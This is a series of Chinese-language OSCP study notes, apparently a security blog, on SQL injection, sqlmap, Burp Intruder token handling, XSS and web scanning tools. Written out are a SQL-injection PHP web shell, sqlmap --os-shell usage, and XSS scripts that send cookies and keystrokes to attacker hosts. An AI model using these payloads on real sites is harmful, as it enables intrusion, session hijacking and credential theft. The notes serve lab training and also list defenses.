接下来，我们将尝试使用 INTO OUTFILE 函数在服务器的 Web 根目录中创建恶意 PHP 文件。根据我们已经看到的错误消息，我们应该知道 Web 根目录的位置。我们将尝试编写一个简单的 PHP 一行代码，类似于 LFI 示例中使用的代码：

http://10.11.0.22/debug.php?id=1 union all select 1, 2, "<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE 'c:/xampp/htdocs/backdoor.php'

如果成功，该文件应该放在 Web 根目录中：

此命令产生错误消息，但这并不一定意味着文件创建不成功。让我们尝试使用 cmd 参数（如 ipconfig）访问新创建的 backdoor.php 页面。

练习

利用 SQL 注入以及 MariaDB INTO OUTFILE 函数获取代码执行。
将简单的代码执行转变为完整的 shell。

自动化 SQL 注入

我们遵循的 SQL 注入过程可以借助 Kali Linux 中预安装的几个工具实现自动化。其中一个更值得注意的工具是 sqlmap，它可用于识别和利用针对各种数据库引擎的 SQL 注入漏洞。

让我们在示例 Web 应用程序上使用 sqlmap。我们将使用 -u 设置要扫描的 URL，并使用 -p 指定要测试的参数：

1kali@kali:~$ sqlmap -u http://10.11.0.22/debug.php?id=1 -p "id"

Sqlmap 将发出多个请求来探测参数是否易受 SQL 注入攻击。它还尝试确定正在使用的数据库软件，以便可以针对该软件调整攻击。在这种情况下，它发现了四种不同的技术来利用漏洞。它还列出了每种技术的 payload。即使 sqlmap 为我们完成工作，拥有这些示例 payload 也有助于我们理解它是如何利用漏洞的。

我们现在可以使用 sqlmap 自动从数据库中提取数据。我们将再次运行 sqlmap，使用 –dbms 将"MySQL"设置为后端类型，并使用 –dump 转储数据库中所有表的内容。Sqlmap 在 –dbms 标志中支持多个后端数据库，但它不区分 MariaDB 和 MySQL。将"MySQL"设置为足以满足此示例。

1kali@kali:~$ sqlmap -u http://10.11.0.22/debug.php?id=1 -p "id" --dbms=mysql --dump

除了在终端窗口中显示内容外，sqlmap 还创建了一个包含转储内容的 CSV 文件。

Sqlmap 有许多其他功能，例如尝试绕过 Web 应用程序防火墙（WAF）的能力，以及执行复杂查询以自动完全接管服务器的能力。例如，使用 os-shell 参数将尝试在目标系统上自动上传和执行远程命令 shell。

我们可以通过使用 –os-shell 运行 sqlmap 在系统上执行 shell 来使用此功能：

1kali@kali:~$ sqlmap -u http://10.11.0.22/debug.php?id=1 -p "id" --dbms=mysql --os-shell

一旦 sqlmap 建立了 shell，我们就可以在服务器上运行命令并查看输出，如列表 337 所示。这个 shell 可能有点慢，但它可以提供一个有效的立足点来访问底层服务器。

重要提示： 请注意，OSCP 考试中不允许使用 sqlmap。但是，我们建议在实验室和 Windows 10 实验室机器上进行练习。考虑将其与 Burp 和 Wireshark 等工具结合使用，以捕获工具正在执行的操作，然后尝试手动复制攻击。这通常是一种非常有效的学习技术，不应被忽视。

练习

使用 sqlmap 获取数据库的完整转储。
使用 sqlmap 获取交互式 shell。

第九章总结

第九章内容提到了很多常见的web漏洞，但是教材上能提到的利用方法只简单描述了原理，没有考虑真实复杂环境下的WAF过滤，系统版本等问题。部分命令已无法再直接利用，推荐自行做专题的练习。

[[upload-Labs 靶场 WP]] [[sqli-labs 靶场合集 WP]] [[DVWA 靶场 WP|DVWA]] [[xss-labs 靶场 WP]]

在线靶场-综合漏洞练习靶场

更推荐用Docker镜像在本地练习更方便查看靶场内部设置，这样你可以直接查看你的上传的木马，注入的语句，在靶机里都是如何运作的，可以直接求证。一键拖取全部镜像命令：

1docker run -d --name upload-labs -p 8883:80 c0ny1/upload-labs
2docker run -d --name xss-labs -p 8884:80 vulfocus/xss-labs
3docker run -d --name sqli-labs -p 8887:80 acgpiano/sqli-labs
4docker run -d --name dvwa -p 8888:80 vulnerables/web-dvwa

OSCP第十章之后的内容，本博客和公众号不再发布笔记，感兴趣的可以自行报名OSCP学习，或加入泷羽学习群分享交流。

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

Day26 Web漏洞-XSS跨站脚本

Tue, 05 Aug 2025 14:20:01 +0000

关注泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

上一节补充核心知识点：Burp Suite 处理动态 Token 的流程

下文的 phpMyAdmin 替换为 DVWA 漏洞练习靶场为例子。

1. 问题分析

目标防护机制：
phpMyAdmin 登录表单包含动态生成的 token 和 set_session 值，每次请求都会变化，用于防止 CSRF 和暴力破解。
关键挑战：
直接爆破密码会因 Token/Session 不匹配失败（返回错误 Error: Token/Session mismatch）。调整DVWA靶场的安全设置为High然后打开 Brute Force 有个登录框，可以练习登录的漏洞。随便输入用户名密码抓包后查看发现是有token值的，当前的响应是200，是正常的。但是当放到重放器中再次发包后返回的结果就是302，这样的话似乎就没办法用Burp爆破密码了。因为token值每发一次就会变化一次。如果在浏览器直接刷新也会提示token过期的。

2. 解决方案：Burp Intruder 的宏（Macro）功能

核心思路：通过 Recursive Grep（递归提取） 从服务器响应中动态捕获 Token/Session 值，并自动注入到后续请求。

3. 配置步骤

Step 1: 设置攻击位置（Positions）

清除默认标记：点击 Clear § 移除 Burp 自动标记的位置。
手动标记关键参数（4个位置需动态更新）：
1. Cookie 中的 phpMyAdmin 值
  （示例：Cookie: phpMyAdmin=§动态值§）
2. POST 表单中的 set_session
  （示例：set_session=§动态值§）
3. 密码字段 pma_password
  （固定用户 root，爆破密码：pma_password=§密码字典§）
4. Token 字段 token
  （示例：token=§动态值§）教材中用的是phpmyadmin，这里用的DVWA一样的，在要爆破的字段上设置"节"符号§，点击 Add § 按钮即可添加。

Step 2: 配置 Payloads（递归提取动态值）

Payload Set 1 & 2（Session 值）
- 类型：Recursive Grep
- 提取规则：
  从响应中抓取 set_session 的隐藏字段值：
```
<input type="hidden" name="set_session" value="§提取值§" />
```
  配置定界符：
  - Start: name="set_session" value="
  - End: "
Payload Set 4（Token 值）
- 类型：Recursive Grep
- 提取规则：
  从响应中抓取 Token 值：
```
<input type="hidden" name="token" value="§提取值§" />
```
  配置定界符：
  - Start: name="token" value="
  - End: " 打开设置，找到Session设置，看到有会话处理规则和宏的界面。选择刚刚登录抓过的包，搜索确定有token值的那个。点击添加宏。将字段匹配上去，名字是user_token，从 value=’ 开始，然后正则匹配后面的字符。直接在页面上选中文字拖拽可以自动匹配，添加好后保存。点击会话规则添加新规则。选择运行宏。汉化版的翻译对照。选择只更新此参数。设置工作的范围，只要重放和爆破两个确保打开即可，设置网络为目标的网络或者选择全都通过。再次发包发现即可无限次发包了。

这里我没有成功，用的是别人成功的截图。

Step 3: 配置密码爆破（Payload Set 3）

类型：Simple List
内容：常用密码字典（如 root、password、admin 等）。

4. 核心技术：宏 Macros 如何工作

首次请求：
- Burp 发送初始登录请求，服务器返回包含新 Token/Session 的 HTML。
提取动态值：
- 根据 Recursive Grep 规则，从响应中抓取最新 Token/Session。
注入下一次请求：
- 将提取值自动填充到后续请求的标记位置（§§）。
循环直至成功：
- 每次请求更新 Token/Session，绕过防护机制爆破密码。

5. 成功关键点

定界符精度：
需精确匹配 HTML 中 Token/Session 的上下文（如 value="..."），避免提取错误。
Payload 顺序：
Pitchfork 要求每组 Payload 数量一致（密码字典需与 Token 列表同步）。
错误处理：
需验证提取逻辑是否覆盖服务器返回的所有动态值（Session + Token）。

6. 替代方案（Burp 的 Session Handling Rules）

若需更灵活处理 Token，可创建 宏（Macro） + Session Rule：

新建 Macro：
- 捕获登录页 GET 请求 → 提取 Token/Session。
创建 Session Rule：
- 在爆破前自动执行 Macro，更新请求中的 Token/Session。
应用范围：
绑定到 Intruder 或整个项目，自动化处理所有相关请求。

XSS漏洞

Info

XSS漏洞在OSCP中不考i，而且在大多数漏洞平台不收录XSS的漏洞，但是在渗透钓鱼中可以作为辅助手段来达到目的。所以简单了解和知道基本的利用操作是很有必要的。比如在baidu.com中如果xss弹出一个下面这个网站的域名，从而引导“粗心的”用户输入密码等信息，就能窃取用户凭证和其他敏感信息。

核心安全概念：数据消毒（Data Sanitization）

定义与重要性
- 数据消毒是清除或转换用户输入中危险字符/字符串的过程
- 未消毒数据危害：攻击者可注入恶意代码（如XSS/SQL注入）
- 深度防御原则：应在输入点（提交时）和输出点（显示时）双重消毒

漏洞成因

// 危险示例：直接输出未消毒数据
echo "<td>" . $row["text"] . "</td>";

解决方案：使用htmlspecialchars()转换特殊字符

// 安全示例
echo "<td>" . htmlspecialchars($row["text"]) . "</td>";

跨站脚本攻击（XSS）

漏洞类型

类型	特征	常见场景
存储型XSS	攻击载荷持久化存储在服务器（数据库/缓存）	论坛评论、产品评价
反射型XSS	恶意代码通过URL参数动态返回给用户	搜索结果页、错误消息
基于DOM型XSS	攻击发生在浏览器DOM解析层（不与服务端交互）	客户端数据处理逻辑漏洞

漏洞检测方法

定位入口点
- 寻找接受用户输入并回显的字段（如搜索框、反馈表单）
注入测试字符
```
< > ' " { } ; // HTML/JavaScript特殊字符
```
- 检查输出：若字符未被编码（如<未转为<），则存在风险如图，输入的恶意字符原模原样的输出，说明没有过滤和转义这些字符。完整的练习可以通过[[xss-labs 靶场 WP|xss-labs]] 靶场练习。

XSS利用技术实战

基础攻击示例

<script>alert('XSS')</script> // 触发弹窗验证漏洞

第二关就转义了这些恶意字符，所以直接输的话是弹不了的。还可以加上Burp抓包用字典遍历所有的XSS

攻击流程：
提交恶意反馈 → 存储至数据库 → 管理员查看页面 → 触发攻击

进阶利用：会话劫持

窃取Cookie原理
- 绕过HttpOnly标志：通过XSS直接读取document.cookie
```
<script> 
 new Image().src="http://attacker-ip/?cookie=" + document.cookie;
</script>
```
劫持管理员会话
- 步骤：
  - 诱使管理员访问含恶意脚本页面
  - 脚本将Cookie发送至攻击者服务器
  - 攻击者使用盗取的PHPSESSID伪装管理员

防御措施

防御层面	具体措施
输入消毒	提交时过滤`< > ' "`等危险字符
输出编码	显示时强制转义（如PHP的`htmlspecialchars()`）
安全标记	设置Cookie的`HttpOnly`和`Secure`属性
内容安全策略	配置CSP头限制脚本来源（如`Content-Security-Policy: script-src 'self'`）

技术关键点解析

漏洞本质
客户端攻击：浏览器执行恶意脚本而非服务端，但可导致服务端权限沦陷
跨域限制绕过
通过注入<iframe>或Image对象将数据外带至攻击者服务器
```

<iframe src="http://attacker-ip" style="display:none"></iframe>
```

自动化攻击验证
使用PowerShell脚本模拟管理员行为：

# admin_login.ps1
$ie = New-Object -com InternetExplorer.Application
$ie.Visible = $true
$ie.Navigate("http://vuln-site/login.php")
# 自动填写凭证并提交...

9.4.2.5 练习

利用示例应用程序中的XSS漏洞获取管理cookie并劫持会话。切记在Windows 10实验室计算机上使用PowerShell脚本模拟管理员登录。
考虑使用此应用程序中的XSS漏洞进行攻击的其他方式。
此漏洞会攻击站点的服务器还是客户端？

1. 利用XSS漏洞获取管理员Cookie并劫持会话的步骤

攻击流程如下（需在Windows 10实验环境中配合PowerShell模拟管理员登录）：

注入恶意Payload
- 在存在XSS漏洞的输入点（如评论框、URL参数）注入以下脚本：
```
<script>
 var img = new Image();
 img.src = 'http://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie);
 img.style.display = 'none';
 document.body.appendChild(img);
</script>
```
  此脚本会悄无声息地将当前用户的Cookie发送至攻击者控制的服务器（attacker.com）。
诱导管理员触发漏洞
- 若为反射型XSS，构造含恶意脚本的URL，通过社工手段诱使管理员点击（例如伪装成站内通知链接）。
- 若为存储型XSS，直接将Payload提交至数据库（如论坛发帖），等待管理员浏览页面自动触发。
捕获Cookie并劫持会话
- 攻击者从服务器日志提取Cookie中的会话ID（如PHPSESSID=abc123）。
- 使用浏览器开发者工具或插件（如EditThisCookie）将Cookie植入自身浏览器，访问后台路径（如/admin）即可伪装管理员身份。
PowerShell模拟管理员登录（实验环境）
- 编写脚本自动发送含窃取Cookie的请求：
```
Invoke-WebRequest -Uri "http://vulnerable-site.com/login" -Method Post -Body @{username="admin"; password="P@ssw0rd"} 
# 后续请求携带窃取的Cookie访问后台
```
- 此步骤用于验证会话劫持可行性，无需实际破解密码。

2. XSS漏洞的其他攻击利用方式

除会话劫持外，XSS漏洞可扩展为以下攻击：

键盘记录与数据窃取

注入脚本捕获用户键盘输入（如账号密码），通过Beacon API发送至攻击者服务器：
```
document.addEventListener('keydown', e => navigator.sendBeacon('http://attacker.com/log', e.key));
```
可窃取表单内容、LocalStorage数据（如用户令牌）。
组合CSRF攻击

利用XSS绕过CSRF防护，以内联脚本伪造敏感操作（如修改密码）：
```
fetch('/account/change_email', {method: 'POST', body: 'email=attacker@example.com'});
```
无需用户交互即可接管账户。
内网探测与反向代理

通过恶意脚本扫描内网资源，将结果回传：
```
for (let i=1; i<255; i++) fetch(`http://192.168.1.${i}`, {mode: 'no-cors'}) 
 .then(() => sendToAttacker(`192.168.1.${i}_active`));
```
用于定位未公开的后台或漏洞设备。

持久化水坑攻击

篡改页面内容（如添加伪造登录弹窗），诱骗用户输入凭证：

<div id="fakeLogin" style="position:fixed; top:0; background:white;"> 
 <input type="text" id="username" placeholder="Username"> 
 <input type="password" id="password" placeholder="Password"> 
</div>

结合事件监听窃取输入数据。

3. XSS漏洞的攻击目标：客户端而非服务器

关键结论：XSS攻击对象是客户端（用户浏览器），而非服务器。

原理：

XSS本质是恶意脚本在用户浏览器执行，利用的是网站对用户输入的输出编码缺失或DOM处理不当。服务器仅存储或反射脚本，自身代码不被破坏。
间接影响服务器场景：

若受害者是管理员，攻击者可能通过劫持其会话：
- 上传Webshell控制服务器；
- 窃取数据库凭据或敏感文件；
  
  但此过程仍以客户端为跳板，非直接攻击服务端代码。

防御措施关键点

输入输出处理
- 输入层：白名单过滤（如仅允许字母数字）。
- 输出层：对动态内容HTML编码（如<转义为<）。
安全Header配置
- Content-Security-Policy: script-src 'self'禁止外部脚本。
- Set-Cookie: sessionId=xxx; HttpOnly; Secure阻止JS访问Cookie。
现代框架防护
- React/Vue默认转义插值内容，避免dangerouslySetInnerHTML滥用。

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

Day24 Web程序漏洞测试工具

Mon, 28 Jul 2025 15:31:31 +0000

关注泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

Web程序漏洞测试工具

在完成对Web应用的人工全面勘察后，我们应当借助Web应用评估工具进一步挖掘目标信息。 Kali系统默认集成了多种此类工具，可高效探测并利用Web漏洞。本节将介绍部分关键工具（含简易浏览器扩展），后续章节则将聚焦手动漏洞枚举与利用技术。

自动化工具虽能提升渗透测试效率，但手动利用能力始终是核心基础：

场景适应性：特殊环境中工具不可用
精准控制：自定义攻击载荷绕过防护
深度突破：工具无法覆盖的逻辑漏洞
终极法则：工具自动化使工作更轻松，但无法完全替代人的作用。

graph LR
A[人工勘察] --> B[工具辅助]
B --> C{攻防双路径}
C --> D[自动化扫描] --> D1[高效覆盖]
C --> E[手动渗透] --> E1[绕过防护] 
E1 --> E2[精准打击]
E2 --> F[漏洞深度利用]

目录遍历

使用如下形式枚举网站的目录，也叫目录遍历。

1dirb http://www.megacorpone.com -r -z 10

🔍 目录爆破工具全景图

工具	语言	核心优势	典型场景
DirB	C	轻量级/递归扫描	内网快速探测
GoBuster	Go	多线程/支持DNS/S3桶	云环境资产发现
DirSearch	Python	智能字典/结果过滤	精确路径爆破
FFUF	Go	速度最快(20000+ req/s)	大规模目标扫描
FeroxBuster	Rust	自动递归/动态超时	深度路径挖掘

⚙️ 高级用法实战手册

1. DirB - 内网渗透利器

1# 递归扫描3级目录（避开图片/css/js）
2dirb http://target.com /usr/share/wordlists/dirb/common.txt -r -l 3 -X .jpg,.css,.js
3
4# 代理链扫描（通过BurpSuite）
5dirb http://target.com -p http://127.0.0.1:8080
6
7# 自定义HTTP头（绕过基础WAF）
8dirb http://target.com -H "X-Forwarded-For: 192.168.1.1" -H "User-Agent: Googlebot"

2. GoBuster - 云环境克星

1# 多扩展名扫描（ASP/PHP/JSP）
2gobuster dir -u http://target.com -w /path/to/wordlist.txt -x asp,php,jsp
3gobuster dir -u http://www.megacorpone.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x asp,php,jsp
4
5# AWS S3桶爆破（需AK/SK）
6gobuster s3 -k -w bucket-names.txt -t 50 -s 200,301
7
8# VHost虚拟主机发现
9gobuster vhost -u http://target.com -w subdomains.txt -t 20

3. DirSearch - 精确打击专家

 1# 智能后缀检测
 2dirsearch -u http://target.com -e php,asp,aspx,jsp
 3
 4# 时间延迟规避（防封IP）
 5dirsearch -u http://target.com --delay=1.5
 6
 7# 结果实时保存
 8dirsearch -u http://target.com -o report.json --format=json
 9
10dirsearch -u http://www.megacorpone.com -e php,asp,aspx,jsp --delay=1.5 -o report.json --format=json

🚀 替代方案

1. FFuf - 速度之王

 1# 多级目录并行爆破
 2ffuf -w /path/to/wordlist:DIR -u http://target.com/DIR -t 200 -c
 3
 4# 参数模糊测试（发现API隐藏参数）
 5ffuf -w params.txt:PARAM -u "http://target.com/api?PARAM=FUZZ" -fs 0
 6
 7# 集群扫描模式（分布式爆破）
 8ffuf -w wordlist.txt -u http://target.com/FUZZ -s -cluster -cluster-nodes 192.168.1.10-15
 9
10ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:DIR -u http://www.megacorpone.com/DIR -t 200 -c

2. FeroxBuster - 深度递归专家

1# 自动目录递归（深度优先）
2feroxbuster -u http://target.com -d 5 -r
3
4# 动态超时设置（适应网络环境）
5feroxbuster -u http://target.com --dynamic-timeout
6
7# 敏感文件捕获（匹配关键词）
8feroxbuster -u http://target.com --capture-keywords password,backup

3. Wfuzz - 高级逻辑爆破

1# 多参数组合测试
2wfuzz -z file,users.txt -z file,pass.txt -d "user=FUZZ&pass=FUZ2Z" http://target.com/login
3
4# 分块扫描模式（绕过WAF）
5wfuzz -z range,0-100 --slice "skip 10; take 5" http://target.com/?id=FUZZ

🛡️ 高级规避技巧

流量伪装术

1# 随机化请求特征（防止WAF指纹识别）
2ffuf -w wordlist.txt -u http://target.com/FUZZ -H "X-Forwarded-For: $((RANDOM%256)).$((RANDOM%256)).$((RANDOM%256)).$((RANDOM%256))"

分布式扫描架构

1# 使用Redis协调分布式节点
2feroxbuster --redis 192.168.1.100:6379 -u http://target.com

CDN穿透策略

1# 通过真实IP扫描（Censys获取）
2gobuster dir -u http://203.0.113.5 -H "Host: target.com"

🔧 Burp Suite 基础安装配置

安装启动

# Kali默认安装社区版，专业版需官网下载
burpsuite # 启动

初始化选项：选择 Temporary Project → Use Burp defaults → Start Burp

代理设置

默认监听：127.0.0.1:8080
关闭拦截：Proxy → Intercept → Intercept is off（避免手动转发每个请求）

浏览器代理

Firefox扩展：安装 FoxyProxy Basic
配置路径：扩展图标 → Options → Add
参数：Type: HTTP, IP: 127.0.0.1, Port: 8080
启用代理：选择 Use proxy Burp for all URLs

🔐 HTTPS抓包解决方案

步骤	操作
1. 导出证书	Burp → `Proxy` → `Options` → `Import/export CA certificate` → 导出`DER`格式
2. 导入浏览器	Firefox → 设置 → 隐私与安全 → 证书 → 导入 → 勾选`信任此CA`
3. 关闭干扰	Firefox地址栏输入`about:config` → 设置`network.captive-portal-service.enabled=false`

⚠️ 证书更新：若报错需在Burp中Regenerate CA certificate并重新导入

🛠️ 核心功能模块

模块	作用	实战场景
Proxy	流量拦截/修改	1. 拦截请求修改参数（如越权测试） 2. `HTTP History`查看历史请求
Repeater	请求重放测试	1. 右键请求 → `Send to Repeater` 2. 修改参数重放（如SQL注入`' OR 1=1--`）
Intruder	自动化参数爆破	1. 定位攻击点 → `Add §` 2. 载入字典爆破（如密码/目录）
Scanner	漏洞扫描（仅专业版）	自动检测SQLi/XSS等漏洞

⚡ 高效操作技巧

快速定位关键请求

Proxy → HTTP history → 筛选Method或Status

绕过强制门户检测

Firefox设置network.captive-portal-service.enabled=false

多请求并行测试

发送多个请求到Repeater，独立选项卡管理

结果对比分析

Repeater中启用Compare功能对比两次响应差异

📌 重要注意事项

OSCP考试限制

禁止使用Burp Suite Professional（但考试无需高级功能）

移动端抓包

# 开启IP转发
sudo sysctl -w net.ipv4.ip_forward=1
# 配置流量重定向
sudo iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 80 -j REDIRECT --to-port 8080

资源占用优化

User options → Memory → 调至1024MB防崩溃

🔍 Nikto 使用指南

核心定位：
开源 Web服务器漏洞扫描器，专用于快速发现服务器配置错误、危险文件和版本漏洞。

核心功能：

风险检测：扫描 6,800+ 种危险文件/程序（如 /admin.php、/backup.zip）
配置审计：检查缺失的安全头部（如 X-Frame-Options）、暴露目录
版本漏洞：识别过时的服务器软件（如 Apache 2.2.22 已停止维护）
敏感信息：查找 robots.txt、/phpinfo.php 等敏感路径

技术特点：

⚠️ 非隐蔽扫描：主动发送大量请求，User-Agent 中会暴露 Nikto 标识
🚀 快速覆盖：适合初步资产风险排查
⏱️ 支持限时扫描：避免长时间占用资源

⚙️ 基础使用命令

1. 最小化扫描（快速启动）

nikto -host http://target.com # 扫描目标域名/IP

2. 控制扫描时间

nikto -host http://target.com -maxtime 30s # 30秒后强制终止

3. 精细调优检测项

nikto -host http://target.com -T 2 # 仅检查危险文件和目录

常用调优参数 -T 代码表：

代码	检测类型	适用场景
`0`	文件上传漏洞	检查可写目录
`1`	日志文件泄露	查找 `/logs`、`/access.log`
`2`	危险文件/目录	扫描 `/admin`、`/backup`
`3`	信息泄露	检查配置文件、版本信息
`4`	注入漏洞（SQL/XSS）	初阶注入点探测

4. 绕过基础防护

nikto -host http://target.com -evasion 1 # 使用URL编码绕过WAF

躲避技术代码表：

代码	技术描述
`1`	随机URL编码
`2`	自选目录分隔符（`/`→`/./`）
`3`	伪造请求结尾（`%20HTTP/1.0`）

📊 实战输出解析示例

nikto -host http://www.megacorpone.com -T 2 -maxtime 120s

关键结果解读：

1. **服务器信息**：Apache/2.4.62 (Debian) 
2. **高危漏洞**：缺失防点击劫持头(X-Frame-Options) 
3. **中危漏洞**：未设置内容类型头(X-Content-Type-Options) 
4. **敏感泄露**：robots.txt暴露可访问文件`/nanites.php` 
5. **信息泄露**：ETag头可能泄露文件指纹(CVE-2003-1418) 
6. **扫描中断**：120秒时限到期，未完成检测

⚠️ 使用注意事项

隐蔽性问题：

扫描特征明显，企业环境可能触发告警
建议在授权测试或外围资产扫描时使用
不验证漏洞可利用性（需手动复现）
无法检测业务逻辑漏洞（如越权支付）
大型电商站点可能需数小时 → 务必用 -maxtime 限时

🛠️ 进阶组合技巧

场景：快速排查学校官网风险

# 限时60秒，只查高危项，绕过基础WAF
nikto -host http://university.edu -maxtime 60s -T 0234 -evasion 13

场景：与 cURL 联动验证漏洞

# 1. Nikto发现可疑路径
[+] /backup.sql.gz found

# 2. 用cURL手动验证
curl -I http://target.com/backup.sql.gz
HTTP/1.1 200 OK # 确认文件可访问

💎 总结

适用场景：

资产普查阶段的服务器风险初筛
合规性检查（如安全头部、版本生命周期）
红蓝对抗中的外围打点侦查

替代方案：

# 需隐蔽扫描 → 使用 dirsearch + 随机UA 
# 需深度检测 → 结合 Burp Suite 手动测试

Kali中的其他网络漏洞扫描工具

根据您提供的图片信息，以下是对截图中的除Nikto外的六个安全测试工具的介绍、用法及核心优势：

1. davtest

功能：
测试 WebDAV（基于HTTP的文件传输协议）服务器的配置安全性，探测其支持的方法（如PUT/DELETE）是否存在漏洞。
基本用法：

davtest -url http://target.com/webdav/

优势用法：

自动上传恶意文件：尝试上传WebShell（如.jsp/.php）测试执行权限。
方法枚举：用 -move 和 -sendbd auto 自动测试文件上传+移动漏洞。
适用场景：
快速检测可写WebDAV目录和危险方法（如PUT）开放情况。

2. nuclei

功能：
基于YAML模板的高速漏洞扫描工具，社区提供数千预置模板（CVE检测、配置错误等）。
基本用法：

nuclei -u http://target.com -t cves/ -severity critical

优势用法：

批量目标扫描：nuclei -list urls.txt -t exposures/configs/（结合子域名枚举结果）。
自定义模板：快速编写YAML规则检测0day或内部系统漏洞。
核心优势：

海量模板+高并发：单机每秒处理数百请求，适合全网段资产快速筛查。 ==推荐模板全家桶仓库：==https://github.com/emadshanab/Nuclei-Templates-Collection/

3. skipfish

功能：
主动爬取式扫描器，生成交互式报告，擅长检测注入、XSS等Web漏洞。
基本用法：

skipfish -o ./report http://target.com

优势用法：

深度扫描：-I /api/ 限定路径避免爬虫过载。
误报调优：用 -l xss,exec 仅扫描高风险漏洞类型。
核心优势：

动态语法分析：模拟执行JavaScript，优于静态爬虫（如dirb）。

4. wapiti

功能：
轻量级黑盒漏洞扫描器，支持GET/POST参数测试（SQLi/XSS/命令注入等）。
基本用法：

wapiti -u http://target.com/ -f html -o report.html

优势用法：

绕过WAF：--skip="logout" 忽略登出链接维持会话。
表单注入测试：对登录框、搜索框自动注入Payload。
适用场景：
快速验证常见Web漏洞，输出简洁报告供开发修复参考。

5. whatweb

功能：
技术栈指纹识别工具，通过HTTP响应识别CMS、框架、服务器等。
基本用法：

whatweb -v http://target.com

优势用法：

批量识别：whatweb -i targets.txt --open-timeout=30
深度探测：--aggression=3（最大强度分析JS/Cookies等）。
核心价值：

10秒内识别目标技术栈（如WordPress 6.4.3 + PHP 8.2 + Nginx），为后续漏洞利用提供方向。

6. wpscan

功能：
WordPress专项扫描器，检测主题/插件漏洞、弱密码、配置错误等。
基本用法：

wpscan --url http://target.com

优势用法：

暴力破解：--passwords /path/to/wordlist.txt 枚举后台账号。
漏洞利用：--plugin vuln-slug --vulnerabilities 检测已知漏洞插件。
核心优势：

实时同步WP漏洞库：精准识别超过54,000个插件/主题漏洞（需API key）。

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

Day22 Kali漏洞扫描

Fri, 25 Jul 2025 23:45:31 +0000

关注泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

对应OSCP官方教材第八章。

漏洞扫描：安全评估的自动化基石

漏洞扫描（简称“漏扫”），作为网络安全领域不可或缺的核心技术手段，贯穿于安全评估的始终。其本质是通过集成海量漏洞验证脚本（POC）与利用脚本（EXP），向目标系统发送特定探测请求，并根据返回响应特征自动化识别潜在安全弱点的过程。

核心价值与定位：

效率引擎： 面对海量资产（如数十甚至上百个站点、服务器），手工检测效率低下且难以覆盖。漏扫工具凭借其自动化、批量化的特性，成为快速发现大面积、已知漏洞的首选武器，是安全审计流程中至关重要的第一步。
风险探照灯： 在复杂的网络环境中，“你永远不知道漏洞扫描会发生什么”。它是主动暴露未知风险、预防潜在攻击的有效途径。
技术与场景融合： 技术本身无高下之分，“黑猫白猫，抓到老鼠就是好猫”。自动化漏扫与精细化手工测试并非对立，而是互补。最佳实践是：先利用漏扫进行广覆盖、批量化的初步筛查，再对高风险目标或复杂逻辑进行深度手工验证，形成“广撒网+深挖潜”的高效组合拳。

工作原理与流程： 一个典型的漏洞扫描流程包含以下关键步骤：

主机发现： 识别网络中存活的目标设备。
端口扫描： 探测目标设备开放的网络端口。
指纹识别： 基于服务响应（如Banner、协议行为、文件特征）判断操作系统、应用、服务及其版本（需注意版本伪装现象，如某些Tomcat版本统一返回相同头部）。
服务与行为分析： 深入探测服务细节、暴露的文件、目录等。
漏洞特征匹配/利用验证： 运用庞大的POC/EXP库进行探测。部分高级扫描会进行试探性攻击以降低误报（但需谨慎评估风险）。

漏洞扫描核心总结

1. 手动扫描与自动扫描的辩证关系

维度	手动扫描	自动扫描
优势	精准发现逻辑漏洞；绕过防护机制；隐蔽性高（适合红队）；对目标干扰小	快速覆盖大规模目标；建立安全基准；标准化漏洞验证（如CVE匹配）
劣势	效率极低（难以处理大型目标）；高度依赖经验；易遗漏重复性漏洞	高误报/漏报率；难以发现复杂业务逻辑漏洞；攻击特征明显易触发告警
适用场景	关键系统深度测试、红队隐蔽渗透、漏洞二次验证	初筛阶段、合规性检查、周期性安全巡检

结论: 二者非对立关系，应遵循 “先自动化广覆盖，后手工精准打击” 的策略。渗透测试的核心价值在于 超越工具的人工分析能力。

2. 互联网扫描 vs. 内网扫描的关键差异

影响因素	互联网扫描	内网扫描
网络条件	带宽受限、高延迟、跳数多；防火墙/IPS严格过滤	高带宽、低延迟；内网设备可能老旧易崩溃
可见性	仅暴露面服务（ICMP/ARP常被阻断）	全端口可见（可ARP发现主机）
扫描策略	低速扫描（防触发警报）；优先非破坏性POC	可高速扫描；支持侵入式检测（需评估设备耐受性）

操作要点:

速度控制：初始使用低速率扫描，验证结果质量后逐步提速。
发现机制：互联网目标需使用TCP SYN等替代ICMP/ARP。
风险评估：内网扫描警惕对老旧设备的DoS风险。

3. 认证扫描 vs. 非认证扫描的深度对比

层面	认证扫描	非认证扫描
原理	凭据登录系统（SSH/WMI），访问内部资源	纯网络发包探测，无系统权限
检测深度	补丁状态、注册表、配置文件、敏感文件（如Program Files）	仅开放服务漏洞、Banner版本、弱口令等表层风险
准确性	误报率极低（直接验证漏洞存在性）	误报率高（依赖版本特征猜测）
